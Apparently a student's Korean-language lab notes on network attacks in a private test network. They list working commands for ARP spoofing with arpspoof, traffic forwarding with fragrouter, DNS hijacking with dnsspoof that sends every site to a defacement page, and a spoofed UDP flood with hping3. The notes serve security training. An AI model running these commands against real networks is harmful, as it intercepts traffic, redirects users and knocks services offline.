ARP 스푸핑 : ARP를 속이는 공격
MITM 공격 : 중간에서 변조 등을 하는 공격

LAN : 2계층

ARP는 IP를 알고있다
IP->MAC

arpspoof -i eth0 -t 192.168.0.200 192.168.0.2

192.168.0.200 이것을 192.168.0.2으로 속이는 것
칼리리눅스로 전달하는 것

ping 8.8.8.8을 하면 안된다. 칼리리눅스로 연결되기 때문

arpspoof -i eth0 -t 192.168.0.2 192.168.0.200

포워딩을 해줘야지 윈도우에서 리눅스를 지나 라우터로 연결이되 인터넷이 가능해진다.
fragrouter -B1

이후에 ping 8.8.8.8을 하면 연결됨

'>' = 출력해주는 명령어
echo "You are hacked! hahaha" > /var/www/index.html
echo "192.168.0.155 *" > dns.txt
dnsspoof -f dns.txt

윈도우에서 홈페이지를 들어가면 입력한 문자가 나온다. 네이버, 다음 어디든 동일하다.

192.168.0.155

7.7 DDoS
3.3 DDoS

hping3 = 패키지를 만들어내는 옵션 중 하나

hping3 --udp -p 69 192.168.0.171 --flood

hping3 --udp -p 69 192.168.0.171 --flood --rand-source
--rand-source를 붙이면 멈추는데 들어오는 용량이 많아서 인듯

sudo iptables -F
를 쓰면 멈추지 않는다. 보내는 것이 0이다
reject된 부분이 빠져서 0이다.









